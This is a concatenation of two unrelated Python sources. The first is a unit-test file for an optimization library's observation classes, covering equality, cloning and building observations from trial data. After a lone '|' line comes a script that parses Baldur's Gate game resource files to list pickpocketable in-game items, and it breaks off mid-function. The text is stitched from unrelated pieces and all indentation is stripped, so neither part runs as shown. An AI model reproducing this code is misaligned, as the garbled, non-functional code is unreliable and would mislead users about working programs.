self.assertEqual(repr(obsf), printstr)
obsf2 = ObservationFeatures(**attrs)
self.assertEqual(hash(obsf), hash(obsf2))
a = {obsf, obsf2}
self.assertEqual(len(a), 1)
self.assertEqual(obsf, obsf2)
attrs.pop("trial_index")
obsf3 = ObservationFeatures(**attrs)
self.assertNotEqual(obsf, obsf3)
self.assertFalse(obsf == 1)
def testClone(self):
# Test simple cloning.
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertIsNot(obsf, obsf.clone())
self.assertEqual(obsf, obsf.clone())
# Test cloning with swapping parameters.
clone_with_new_params = obsf.clone(replace_parameters={"x": 1, "y": "b"})
self.assertNotEqual(obsf, clone_with_new_params)
obsf.parameters = {"x": 1, "y": "b"}
self.assertEqual(obsf, clone_with_new_params)
def testObservationFeaturesFromArm(self):
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertEqual(obsf.parameters, arm.parameters)
self.assertEqual(obsf.trial_index, 3)
def testUpdateFeatures(self):
parameters = {"x": 0, "y": "a"}
new_parameters = {"z": "foo"}
obsf = ObservationFeatures(parameters=parameters, trial_index=3)
# Ensure None trial_index doesn't override existing value
obsf.update_features(ObservationFeatures(parameters={}))
self.assertEqual(obsf.trial_index, 3)
# Test override
new_obsf = ObservationFeatures(
parameters=new_parameters,
trial_index=4,
start_time=pd.Timestamp("2005-02-25"),
end_time=pd.Timestamp("2005-02-26"),
random_split=7,
)
obsf.update_features(new_obsf)
self.assertEqual(obsf.parameters, {**parameters, **new_parameters})
self.assertEqual(obsf.trial_index, 4)
self.assertEqual(obsf.random_split, 7)
self.assertEqual(obsf.start_time, pd.Timestamp("2005-02-25"))
self.assertEqual(obsf.end_time, pd.Timestamp("2005-02-26"))
def testObservationData(self):
attrs = {
"metric_names": ["a", "b"],
"means": np.array([4.0, 5.0]),
"covariance": np.array([[1.0, 4.0], [3.0, 6.0]]),
}
obsd = ObservationData(**attrs)
self.assertEqual(obsd.metric_names, attrs["metric_names"])
self.assertTrue(np.array_equal(obsd.means, attrs["means"]))
self.assertTrue(np.array_equal(obsd.covariance, attrs["covariance"]))
# use legacy printing for numpy (<= 1.13 add spaces in front of floats;
# to get around tests failing on older versions, peg version to 1.13)
if np.__version__ >= "1.14":
np.set_printoptions(legacy="1.13")
printstr = "ObservationData(metric_names=['a', 'b'], means=[ 4. 5.], "
printstr += "covariance=[[ 1. 4.]\n [ 3. 6.]])"
self.assertEqual(repr(obsd), printstr)
self.assertEqual(obsd.means_dict, {"a": 4.0, "b": 5.0})
self.assertEqual(
obsd.covariance_matrix,
{"a": {"a": 1.0, "b": 4.0}, "b": {"a": 3.0, "b": 6.0}},
)
def testObservationDataValidation(self):
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([1.0, 4.0]),
)
def testObservationDataEq(self):
od1 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od2 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od3 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[2.0, 4.0], [3.0, 6.0]]),
)
self.assertEqual(od1, od2)
self.assertNotEqual(od1, od3)
self.assertFalse(od1 == 1)
def testObservation(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
self.assertEqual(obs.arm_name, "0_0")
obs2 = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs, obs2)
obs3 = Observation(
features=ObservationFeatures(parameters={"x": 10}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertNotEqual(obs, obs3)
self.assertNotEqual(obs, 1)
def testObservationsFromData(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a"]],
"means": [np.array([2.0, 4.0]), np.array([3])],
"covariance": [np.diag([4.0, 16.0]), np.array([[9.0]])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testObservationsFromDataWithFidelities(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.5}),
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.25}),
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"fidelities": json.dumps({"z": 1}),
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "fidelities"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
def testObservationsFromMapData(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "z", "timestamp"]
]
data = MapData(
df=df,
map_key_infos=[
MapKeyInfo(key="z", default_value=0.0),
MapKeyInfo(key="timestamp", default_value=0.0),
],
)
observations = observations_from_map_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
self.assertEqual(obs.features.metadata, {"timestamp": t["timestamp"]})
def testObservationsFromDataAbandoned(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
1: {
"arm_name": "1_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
0.25: {
"arm_name": "2_0",
"parameters": {"x": 1, "y": "a", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
0.75: {
"arm_name": "2_1",
"parameters": {"x": 1, "y": "b", "z": 0.75},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.75},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.75,
"timestamp": 25,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: (
Trial(experiment, GeneratorRun(arms=[arms[obs["arm_name"]]]))
)
for _, obs in list(truth.items())[:-1]
if not obs["arm_name"].startswith("2")
}
batch = BatchTrial(experiment, GeneratorRun(arms=[arms["2_0"], arms["2_1"]]))
trials.update({2: batch})
trials.get(1).mark_abandoned()
trials.get(2).mark_arm_abandoned(arm_name="2_1")
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_no_abandoned = observations_from_data(experiment, data)
self.assertEqual(len(obs_no_abandoned), 2)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_with_abandoned = observations_from_data(
experiment, data, include_abandoned=True
)
self.assertEqual(len(obs_with_abandoned), 4)
def testObservationsFromDataWithSomeMissingTimes(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"start_time": None,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 5.0,
"sem": 5.0,
"trial_index": 2,
"metric_name": "b",
"start_time": None,
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name", "start_time"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a", "b"]],
"means": [np.array([2.0, 4.0]), np.array([3.0, 5.0])],
"covariance": [np.diag([4.0, 16.0]), np.diag([9.0, 25.0])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testSeparateObservations(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
obs_feats, obs_data = separate_observations(observations=[obs])
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
obs_feats, obs_data = separate_observations(observations=[obs], copy=True)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
def testObservationsWithCandidateMetadata(self):
SOME_METADATA_KEY = "metadatum"
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
},
{
"arm_name": "1_0",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 1,
"metric_name": "a",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment,
GeneratorRun(
arms=[arms[obs["arm_name"]]],
candidate_metadata_by_arm_signature={
arms[obs["arm_name"]].signature: {
SOME_METADATA_KEY: f"value_{obs['trial_index']}"
}
},
),
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
for observation in observations:
self.assertEqual(
observation.features.metadata.get(SOME_METADATA_KEY),
f"value_{observation.features.trial_index}",
)
|
###
# Pickpocket list: area > person > item
# Add XP, Gold, Rep
###
import struct
import os
from manual.area_names import gen_area_names
from template_index import index
from handle_page import handle
from root_index import root_index
# wrapper function to convert byte string to regular string
def mystr(a_str):
return str(a_str, 'UTF-8').strip('\x00').replace('"', '\\"')
# Given an index, return a strings
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/tlk_v1.htm
def getname(idx, game):
if idx == -1:
return ""
assert idx >= 0, f"Invalid Name/String index: {idx}"
with open(f'{game}_files\\dialog.tlk', 'rb') as file:
text = file.read()
max_str = struct.unpack('i', text[0xa:0xa+4])[0]
if idx >= max_str:
return ""
abs_str_off = struct.unpack('i', text[0xe:0xe+4])[0]
data_off = 0x1a * idx + 0x12
str_off = struct.unpack('i', text[data_off+0x12:data_off+0x12+4])[0]
str_len = struct.unpack('i', text[data_off+0x16:data_off+0x16+4])[0]
return mystr(text[abs_str_off+str_off:abs_str_off+str_off+str_len])
# Return an array with difficulties for pickpocketing various equipment slots
def load_pickpocketting(game):
# https://baldursgate.fandom.com/wiki/Thief#Pick_Pockets
key_order = ['helmet', 'armour', 'shield', 'gauntlets', 'ring_left', 'ring_right', 'amulet', 'belt', 'boots',
'weapon1', 'weapon2', 'weapon3', 'weapon4', 'ammo1', 'ammo2', 'ammo3', 'ammo4', 'cloak', 'misc1', 'misc2', 'misc3',
'inv1', 'inv2', 'inv3', 'inv4', 'inv5', 'inv6', 'inv7', 'inv8', 'inv9', 'inv10', 'inv11', 'inv12', 'inv13', 'inv14', 'inv15', 'inv16']
vals = {}
with open(f'{game}_files\\sltsteal.2da', 'r') as file:
# skip headers
for i in range(3):
file.readline()
for line in file:
l_list = line.lower().strip().split()
vals[l_list[0]] = int(l_list[1])
return [vals[x] for x in key_order]
# Given a character name, return useful information
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/cre_v1.htm
def view_char(cre_file, item_list, game, dlg_store):
with open(cre_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'CRE '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = {}
# Check version since eah one stores files differently
if version == 'v1.0':
name = 0x8
race = 0x272
status = 0x20
xp = 0x14
gold = 0x1c
item_count_off = 0x2c0
item_offset_off = 0x2bc
pick_off = 0x6a
equip_off = 0x2b8
enemy = 0x270
dlg = 0x2cc
else:
assert False, f"Invalid File Version: '{version}'"
ret['items'] = []
# get list of items, check item slots, assign difficulty
item_count = struct.unpack('i', text[item_count_off:item_count_off+4])[0]
f_race = struct.unpack('B', text[race:race+1])[0]
f_status = struct.unpack('I', text[status:status + 4])[0]
ret['name'] = getname(struct.unpack('i', text[name:name + 4])[0], game)
ret['xp'] = struct.unpack('i', text[xp:xp + 4])[0]
ret['gold'] = struct.unpack('i', text[gold:gold + 4])[0]
dlg_file = mystr(text[dlg:dlg + 8]).lower()
if dlg_file in dlg_store:
ret['stores'] = dlg_store[dlg_file]
if item_count and f_race != 146 and not bool(f_status & 0b111111000000): # We can't pickpocket dragons or dead things
if struct.unpack('B', text[enemy:enemy+1])[0] == 0xff: # Enemies are hostile and cannot be pickpocketed, to my knowledge
return ret
item_offset = struct.unpack('i', text[item_offset_off:item_offset_off+4])[0]
items = []
for idx in range(item_count):
t_off = idx * 0x14 + item_offset
items.append((mystr(text[t_off:t_off + 8]).lower(), bool(struct.unpack('i', text[t_off + 0x10:t_off + 0x10 + 4])[0] & 0b1010), struct.unpack('h', text[t_off + 0xa:t_off + 0xa + 2])[0]))
pickpocket = struct.unpack('b', text[pick_off:pick_off + 1])[0]
equip_offset = struct.unpack('i', text[equip_off:equip_off + 4])[0]
pick_difficulty = load_pickpocketting(game)
equipped = struct.unpack('h', text[38 * 2 + equip_offset:38 * 2 + equip_offset + 2])[0]
if 0 <= equipped < 4:
pick_difficulty[9 + equipped] = 0
for idx, slot in enumerate(pick_difficulty):
if slot:
s_off = idx * 2 + equip_offset
item_idx = struct.unpack('h', text[s_off:s_off + 2])[0]
if item_count > item_idx >= 0:
item_itm = f"{items[item_idx][0]}"
if item_itm in item_list and item_list[item_itm]['drop'] and not items[item_idx][1]:
ret['items'].append({'type': item_list[item_itm]['type'], 'name': item_list[item_itm]['name'], 'price': item_list[item_itm]['price'], 'skill': pickpocket + pick_difficulty[idx]})
if items[item_idx][2] > 1 and item_list[item_itm]['type'] in ['Books & misc', 'Arrows', 'Potion', 'Scroll', 'Bullets', 'Darts', 'Bolts', 'Gold pieces', 'Gem', 'Wand', 'Containers/eye/broken armor', 'Books/Broken shields/bracelets', 'Familiars/Broken swords/earrings', 'Fur/pelt']:
ret['items'][-1]['quantity'] = items[item_idx][2]
return ret
# Given an item name, return useful information
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/itm_v1.htm
# TODO: Wand charge max (from first ability)
def view_item(itm_file, game):
with open(itm_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'ITM '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = {}
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/itm_v1.htm#Header_ItemType
item_type = ['Books & misc', 'Amulet', 'Armor', 'Belt & Girdle', 'Boots', 'Arrows', 'Bracers & gauntlets', 'Headgear', 'Key', 'Potion', 'Ring', 'Scroll', 'Shield', 'Food', 'Bullets', 'Bow', 'Dagger',
'Mace & Club', 'Sling', 'Small sword', 'Large sword', 'Hammer', 'Morning star', 'Flail', 'Darts', 'Axe', 'Quarterstaff', 'Crossbow', 'Hand-to-hand weapon', 'Spear', 'Halberd', 'Bolts',
'Cloaks & Robes', 'Gold pieces', 'Gem', 'Wand', 'Containers/eye/broken armor', 'Books/Broken shields/bracelets', 'Familiars/Broken swords/earrings', 'Tattoos', 'Lenses', 'Bucklers/teeth',
'Candles', 'Unknown', 'Clubs (IWD)', 'Unknown', 'Unknown', 'Large Shields (IWD)', 'Unknown', 'Medium Shields (IWD)', 'Notes', 'Unknown', 'Unknown', 'Small Shields (IWD)', 'Unknown',
'Telescopes (IWD)', 'Drinks (IWD)', 'Great Swords (IWD)', 'Container', 'Fur/pelt', 'Leather Armor', 'Studded Leather Armor', 'Chain Mail', 'Splint Mail', 'Half Plate', 'Full Plate',
'Hide Armor', 'Robe', 'Unknown', 'Bastard Sword', 'Scarf', 'Food (IWD2)', 'Hat', 'Gauntlet', 'Eyeballs', 'Earrings', 'Teeth', 'Bracelets']
# Check version since eah one stores files differently
if version == 'v1 ':
name = 0xc
price = 0x34
flags = 0x18
itm_type = 0x1c
max_count = 0
else:
assert False, f"Invalid File Version: '{version}'"
ret['name'] = getname(struct.unpack('i', text[name:name + 4])[0], game)
ret['price'] = struct.unpack('i', text[price:price + 4])[0]
ret['drop'] = bool(struct.unpack('i', text[flags:flags + 4])[0] & 4)
ret['type'] = item_type[struct.unpack('h', text[itm_type:itm_type + 2])[0]]
return ret
# Given an area name return a list of actors
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/are_v1.htm
def view_area(are_file, cre_dict):
with open(are_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'AREA'), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = []
# Check version since eah one stores files differently
if version == 'v1.0':
actors_off = 0x54
actors_count = 0x58
else:
assert False, f"Invalid File Version: '{version}'"
t_actors = set() # Only include 1 instance of a character from each zone
for idx in range(struct.unpack('h', text[actors_count:actors_count + 2])[0]):
actor = struct.unpack('i', text[actors_off:actors_off + 4])[0] + idx * 0x110
actor_file = mystr(text[actor + 0x80:actor + 0x80 + 8]).lower()
if actor_file in cre_dict:
t_actors.add(actor_file)
for t_act in t_actors:
ret.append(cre_dict[t_act])
return ret, t_actors
# Given a store, return a list of items that can be stolen and how difficult they are
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/sto_v1.htm
def view_store(sto_file):
ret = {'items': [], 'difficult': 0}
with open(sto_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'STOR'), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
# Check version since eah one stores files differently
if version == 'v1.0':
steal = 0x10
diff = 0x20
item_offset = 0x34
item_count = 0x38
# in item
amount = 0x14
infinite = 0x18
stealable = 0x10
else:
assert False, f"Invalid File Version: '{version}'"
if struct.unpack('i', text[steal:steal + 4])[0] & 0b1000: # if you can steal
ret['skill'] = struct.unpack('H', text[diff:diff + 2])[0]
item_offset = struct.unpack('i', text[item_offset:item_offset + 4])[0]
for idx in range(struct.unpack('i', text[item_count:item_count + 4])[0]):
t_off = idx * 0x1c + item_offset
if not bool(struct.unpack('i', text[t_off + stealable:t_off + stealable + 4])[0] & 0b1010):
ret['items'].append((mystr(text[t_off:t_off + 8]).lower(), "Inf" if struct.unpack('i', text[t_off + infinite:t_off + infinite + 4])[0] else struct.unpack('i', text[t_off + amount:t_off + amount + 4])[0]))
return ret
# Given a dialog file, determine if it spawns a store you can steal from
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/dlg_v1.htm
def view_dlg(dlg_file, stores):
ret = []
with open(dlg_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'DLG '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
# Check version since eah one stores files differently
if version == 'v1.0':
action_offset = 0x28
action_count = 0x2c
else:
assert False, f"Invalid File Version: '{version}'"
item_offset = struct.unpack('i', text[action_offset:action_offset + 4])[0]
for idx in range(struct.unpack('i', text[action_count:action_count + 4])[0]):
t_off = idx * 0x8 + item_offset
str_off = struct.unpack('i', text[t_off:t_off + 4])[0]
the_str = mystr(text[str_off:str_off + struct.unpack('i', text[t_off + 0x4:t_off + 0x4 + 4])[0]])
if the_str.startswith('StartStore'):
t_str = the_str.split('\\"')[1].lower()
if t_str in stores and t_str not in ret:
ret.append(t_str)
return ret
# Given a decompiled script file, extract all spawned creatures
def view_bcs(baf_file, cre_dict):
with open(baf_file, 'r', errors='ignore') as f:
t_actors = set() # Only include 1 instance of a character from each zone
ret = []
for line in f:
if 'CreateCreature' in line:
cre = line.split('"')[1].lower()
if cre in cre_dict:
t_actors.add(cre)
for t_act in t_actors:
ret.append(cre_dict[t_act])
return ret, t_actors
# NOTES: sell value is 1/2 of an items value. Items with charges are value/max_count*current_count
def walk_game(game, game_str):
area_lookup = gen_area_names(game)
# Areas -> actors -> items, so generate in reverse
# Create a dictionary with all valid items that can drop
items = {}
# Keep track of what can be stolen from stores
stores = {}
dlg_store = {}
# Create a list of all valid creatures that have valid items to pickpocket
cre_dict = {}
# Go through all areas and check all creatures for ones that can be pickpocketed
are_dict = {}
for r, d, f in os.walk(f"{game}_files"):
itm_files = []
cre_files = []
are_files = []
baf_files = []
sto_files = []
dlg_files = []
for f_temp in f:
f_temp = f_temp.lower()
if f_temp.endswith('.itm'):
itm_files.append(f_temp)
elif f_temp.endswith('.cre'):
cre_files.append(f_temp)
elif f_temp.endswith('.are'):
are_files.append(f_temp)
elif f_temp.endswith('.baf'):
baf_files.append(f_temp)
elif f_temp.endswith('.sto'):
sto_files.append(f_temp)
elif f_temp.endswith('.dlg'):
dlg_files.append(f_temp)
else:
print(f"Unexpected file: '{f_temp}'")
len_f = len(sto_files)
tick = len_f // 40
print(f"Reading {len_f} STO files.")
for c, file in enumerate(sto_files):
if not c % tick:
print(f"{game} STO: {c}/{len_f}")
item = view_store(os.path.join(r, file))
if item['items']:
stores[file[:-4].lower()] = item
len_f = len(dlg_files)
tick = len_f // 40
print(f"Reading {len_f} DLG files.")
for c, file in enumerate(dlg_files):
if not c % tick:
print(f"{game} DLG: {c}/{len_f}")
item = view_dlg(os.path.join(r, file), stores)
if item:
dlg_store[file[:-4].lower()] = item
len_f = len(itm_files)
tick = len_f // 40
print(f"Reading {len_f} ITM files.")
for c, file in enumerate(itm_files):
if not c % tick:
print(f"{game} ITM: {c}/{len_f}")
item = view_item(os.path.join(r, file), game)
# note items with no name
if not item['name']:
item['name'] = f"{file}{"" if file.startswith("rnd") else " (TLK missing name)"}"
# remove EET items that appear to be script/difficulty related, ignore items with no proper name
